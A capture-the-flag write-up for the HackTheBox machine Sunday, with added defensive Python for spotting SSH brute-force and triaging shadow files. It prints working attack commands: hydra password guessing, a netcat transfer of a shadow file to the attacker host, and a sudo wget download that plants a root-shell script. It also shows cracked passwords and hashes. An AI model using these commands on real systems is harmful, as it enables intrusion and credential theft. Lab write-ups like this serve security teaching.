HackTheBox Sunday

Writeup for HackTheBox Sunday

Machine Synopsis

Sunday is a fairly simple machine; however, it uses fairly old software and can be a bit unpredictable at times. It mainly focuses on exploiting the Finger service as well as the use of weak credentials. (Source)

Key exploitation techniques:

  • Finger service user enumeration
  • SSH brute-force with weak credentials
  • sudo misconfiguration with a root-executable script
  • File overwrite vulnerability for root shell

Enumeration

$ nmap -p- 10.10.10.76 --max-retries 0

PORT      STATE SERVICE
79/tcp    open  finger
515/tcp   open  printer
6787/tcp  open  smc-admin
22022/tcp open  unknown

$ nmap -sC -sV -A -p 79,515,6787,22022 10.10.10.76

PORT      STATE SERVICE        VERSION
79/tcp    open  finger?
| fingerprint-strings: 
|   GenericLines: 
|     No one logged on
|   GetRequest: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|   HTTPOptions: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|     OPTIONS ???
|   Help: 
|     Login Name TTY Idle When Where
|     HELP ???
|   RTSPRequest: 
|     Login Name TTY Idle When Where
|     OPTIONS ???
|_    RTSP/1.0 ???
|_finger: ERROR: Script execution failed (use -d to debug)
515/tcp   open  printer
6787/tcp  open  ssl/smc-admin?
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Not valid before: 2021-12-08T19:40:00
|_Not valid after:  2031-12-06T19:40:00
22022/tcp open  ssh            OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey: 
|_  256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)

The scan identified an open finger service (79/tcp) and SSH on a non-standard port (22022/tcp).

The finger service was used for user enumeration. finger-user-enum.pl was employed with a common username wordlist.

# Enumerate users using finger-user-enum.pl
$ ./finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76
...
root@10.10.10.76: root      Super-User            console    <Dec 19, 2021>..
sammy@10.10.10.76: sammy                       ssh        <Apr 13 13:38> 10.10.14.13      ..
sunny@10.10.10.76: sunny                       ssh        <Apr 13 13:52> 10.10.14.13      ..
...

sammy and sunny were identified as valid users. Further finger queries provided basic information for these users.

$ finger sammy@10.10.10.76
Login       Name                  TTY        Idle    When    Where
sammy                             ssh        <Apr 13 13:38> 10.10.14.13

$ finger sunny@10.10.10.76
Login       Name                  TTY        Idle    When    Where
sunny                             ssh        <Apr 13 13:52> 10.10.14.13

Exploitation

SSH Brute-Force (sunny)

hydra was used to brute-force the SSH password for sunny on port 22022 with rockyou.txt.

$ hydra -l sunny -P /usr/share/wordlists/rockyou.txt 10.10.10.76 ssh -s 22022 -f
...
[22022][ssh] host: 10.10.10.76   login: sunny    password: sunday
...

The password sunday was found for sunny. SSH access was gained.
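From the defender's side, a hydra run like the one above leaves a very recognisable trace in sshd's log: a burst of "Failed password" lines from one source address, and then an "Accepted password" from the same address. The Python below is an added example (not part of the original writeup) that flags exactly that pattern. The log lines are constructed to imitate OpenSSH's syslog format, the year supplied to the timestamp parser is an assumption (syslog omits it), and the threshold and window are tuning values chosen for the demonstration.

```python
"""Flag SSH password brute-force bursts in OpenSSH auth logs.

Added example, not part of the original writeup. SAMPLE_LOG is constructed
to imitate sshd's syslog lines during a run like the hydra command above.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample (not real logs from the box): a failure burst from one
# source ending in a password success, plus unrelated normal activity.
SAMPLE_LOG = """\
Apr 13 13:30:01 sunday sshd[2001]: Failed password for sunny from 10.10.14.13 port 40110 ssh2
Apr 13 13:30:01 sunday sshd[2002]: Failed password for sunny from 10.10.14.13 port 40112 ssh2
Apr 13 13:30:02 sunday sshd[2003]: Failed password for sunny from 10.10.14.13 port 40114 ssh2
Apr 13 13:30:02 sunday sshd[2004]: Failed password for sunny from 10.10.14.13 port 40116 ssh2
Apr 13 13:30:03 sunday sshd[2005]: Failed password for sunny from 10.10.14.13 port 40118 ssh2
Apr 13 13:30:03 sunday sshd[2006]: Failed password for invalid user admin from 10.10.14.13 port 40120 ssh2
Apr 13 13:30:04 sunday sshd[2007]: Accepted password for sunny from 10.10.14.13 port 40122 ssh2
Apr 13 13:38:10 sunday sshd[2050]: Accepted publickey for sammy from 10.10.14.2 port 51000 ssh2
Apr 13 13:40:00 sunday sshd[2060]: Failed password for sammy from 10.10.14.2 port 51002 ssh2
"""

# OpenSSH's "Failed/Accepted <method> for [invalid user ]<user> from <ip> port <n>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_line(line, year=2022):
    """Return a dict for an auth result line, or None for anything else.
    Syslog timestamps carry no year, so one is supplied (assumption)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """One finding per source IP with >= threshold password failures inside
    any window_seconds span. The finding also lists password successes from
    that IP after the burst: a success right after a burst is the signature
    of a guessed password, not of a user mistyping their own."""
    events = [e for e in (parse_line(ln) for ln in log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    findings = []
    for ip, evs in by_ip.items():
        fails = sorted((e for e in evs
                        if e["result"] == "Failed" and e["method"] == "password"),
                       key=lambda e: e["ts"])
        burst_end = None
        start = 0                                   # sliding window over fails
        for i, e in enumerate(fails):
            while (e["ts"] - fails[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            if i - start + 1 >= threshold:
                burst_end = e["ts"]
                break
        if burst_end is None:
            continue
        success_after = [e["user"] for e in evs
                         if e["result"] == "Accepted" and e["method"] == "password"
                         and e["ts"] >= burst_end]
        findings.append({"ip": ip, "failures": len(fails),
                         "users": sorted({e["user"] for e in fails}),
                         "success_after_burst": success_after})
    return findings


if __name__ == "__main__":
    for f in detect_bruteforce(SAMPLE_LOG):
        print(f)
```

On the sample, only 10.10.14.13 is reported: six password failures within three seconds, against both a real and an invalid user, followed by a password success for sunny. The single failure from 10.10.14.2 never reaches the threshold. The same logic works on a real /var/log/auth.log or the Solaris equivalent as long as the line format matches the regex.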

$ ssh sunny@10.10.10.76 -p 22022
(sunny@10.10.10.76) Password:sunday
...
sunny@sunday:~$

Privilege Escalation

Sudo /root/troll Abuse (root)

Initial sudo -l as sunny revealed a NOPASSWD entry for /root/troll.

sunny@sunday:~$ sudo -l
User sunny may run the following commands on sunday:
    (root) NOPASSWD: /root/troll

Executing /root/troll showed it was a simple script that printed “testing” followed by uid=0(root) gid=0(root): it was indeed running as root, but it did not provide a shell.

sunny@sunday:~$ sudo /root/troll
testing
uid=0(root) gid=0(root)

Enumeration of the /backup directory revealed shadow.backup and agent22.backup.

sunny@sunday:~$ ls -la /backup
total 28
drwxr-xr-x   2 root     root            4 Dec 19  2021 .
drwxr-xr-x  25 root     sys            28 Jul 24 11:09 ..
-rw-r--r--   1 root     root          319 Dec 19  2021 agent22.backup
-rw-r--r--   1 root     root          319 Dec 19  2021 shadow.backup

shadow.backup contained password hashes, including one for sammy. This file was exfiltrated via netcat.

sunny@sunday:/backup$ cat shadow.backup 
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

# On attacker, set up listener
$ nc -l -p 1234 > shadow.backup

# On target, send file
sunny@sunday:/backup$ nc -w 3 10.10.14.5 1234 < shadow.backup

john was used to crack the hashes in shadow.backup.

$ john --wordlist=/usr/share/wordlists/rockyou.txt shadow.backup
...
sunday           (sunny)
cooldude!        (sammy)
...

The password cooldude! was found for sammy. su to sammy was successful.
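Before reaching for john, it is worth triaging a shadow file like shadow.backup for what it actually exposes: which accounts are locked (*LK*), which have no password at all (NP), which carry hashes an offline cracker can attack, and how stale those passwords are. The Python below is an added example (not from the original writeup) that does that triage over the entries shown above, and adds a check for the weak-credential pattern this box relies on, a password derived from the username or hostname (sunday for sunny on host sunday). The context-password heuristic and the list of hash scheme prefixes are this example's own, not something the writeup ran.

```python
"""Triage a Solaris-style shadow file and check for context-derived passwords.

Added example, not part of the original writeup. SAMPLE_SHADOW reproduces the
entries shown in shadow.backup above; everything else is this example's own.
"""
import re
from datetime import date, timedelta

SAMPLE_SHADOW = """\
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

# crypt(3) prefixes -> scheme name. $5$ is the SHA-256 crypt john cracked above.
SCHEMES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt",
           "$5$": "sha256crypt", "$6$": "sha512crypt"}


def classify_hash(field):
    """Map the password field to a category a reviewer cares about."""
    if field in ("*LK*", "*", "!", "!!"):     # locked (Solaris writes *LK*)
        return "locked"
    if field == "NP":                          # Solaris: no password set
        return "no-password"
    if field == "":
        return "empty"
    for prefix, name in SCHEMES.items():
        if field.startswith(prefix):
            return name
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):  # legacy DES crypt
        return "des"
    return "unknown"


def parse_shadow(text):
    """Parse shadow lines into {user, hash, kind, lastchg} records."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 2:
            continue
        rows.append({"user": parts[0], "hash": parts[1],
                     "kind": classify_hash(parts[1]),
                     "lastchg": parts[2] if len(parts) > 2 else ""})
    return rows


def crackable(rows):
    """Users whose hash an offline cracker can attack at all."""
    return [r["user"] for r in rows
            if r["kind"] not in ("locked", "no-password", "unknown")]


def last_change(days_field):
    """Shadow field 3 is days since 1970-01-01 of the last password change."""
    if not days_field:
        return None
    return date(1970, 1, 1) + timedelta(days=int(days_field))


def context_variants(*words):
    """Trivial mutations of a word that password policies should reject."""
    out = set()
    for w in words:
        w = w.lower()
        out.update({w, w[::-1], w + "1", w + "123", w + "!", w + "2022"})
    return out


def is_context_password(password, username, hostname):
    """True when the password is a trivial variant of, or contains, the
    username or hostname. 'sunday' for sunny@sunday is the textbook case."""
    p = password.lower()
    if p in context_variants(username, hostname):
        return True
    return username.lower() in p or hostname.lower() in p


if __name__ == "__main__":
    rows = parse_shadow(SAMPLE_SHADOW)
    for r in rows:
        print(f"{r['user']:10} {r['kind']:12} last change: {last_change(r['lastchg'])}")
    print("crackable:", crackable(rows))
    print("sunday for sunny@sunday is context-derived:",
          is_context_password("sunday", "sunny", "sunday"))
```

On the sample, only sammy and sunny carry attackable hashes, which is why john returned exactly those two. The lastchg field is also telling: 17636 days is April 2018, and 6445 days is 1987, so neither password has been rotated in years.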

sunny@sunday:~$ su sammy
Password: cooldude!
sammy@sunday:~$

sudo -l as sammy revealed (ALL) ALL and (root) NOPASSWD: /usr/bin/wget.

sammy@sunday:~$ sudo -l
User sammy may run the following commands on sunday:
    (ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

This sudo permission on wget was a powerful privilege escalation vector. Before using it, it was worth understanding what was maintaining /root/troll. ps aux showed a service method script, /lib/svc/method/overwrite, running as root, and sudo wget -i /lib/svc/method/overwrite (which treats each line of the file as a URL and echoes it back in its error messages) disclosed the script's contents: a loop that copies /root/troll.original over /root/troll every 5 seconds.

sammy@sunday:~$ ps aux
USER       PID %CPU %MEM   SZ  RSS TT       S    START  TIME COMMAND
...
root       119  0.0  0.212544 3160 ?        S 11:08:59  0:00 /usr/bin/bash /lib/svc/method/overwrite
...

sammy@sunday:~$ sudo wget -i /lib/svc/method/overwrite
/lib/svc/method/overwrite: Invalid URL http://#!/usr/bin/bash: Invalid host name
/lib/svc/method/overwrite: Invalid URL /usr/gnu/bin/cat /root/troll.original > /root/troll: Scheme missing
/lib/svc/method/overwrite: Invalid URL /usr/gnu/bin/sleep 5: Scheme missing
--2022-07-24 12:33:51--  http://while%20true;%20do/
Resolving while true; do (while true; do)... failed: temporary name resolution failure.
wget: unable to resolve host address 'while true; do'
--2022-07-24 12:33:51--  http://done/
Resolving done (done)... failed: temporary name resolution failure.
wget: unable to resolve host address 'done'

The strategy was to replace /root/troll.original with a malicious script using sudo wget -O.

A simple script named troll, which just executes bash, was created and hosted on the attacking machine with Python's built-in HTTP server.

# troll content
#!/usr/bin/bash
bash

# On attacker, host script
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

The malicious troll script was then downloaded and saved as /root/troll.original using sudo wget.

sammy@sunday:~$ sudo wget http://10.10.14.5/troll -O /root/troll.original

After a short wait for the service method to perform its next copy (it runs every 5 seconds), sudo /root/troll was executed, granting a root shell.

sammy@sunday:~$ sudo /root/troll
root@sunday:/home/sunny#

The user.txt and root.txt flags were retrieved.

root@sunday:/home/sammy# cat /home/sammy/user.txt
a3d9498027ca5187ba1793943ee8a598
root@sunday:/home# cat /root/root.txt
fb40fab61d99d37536daeec0d97af9b8

This post is licensed under CC BY 4.0 by the author.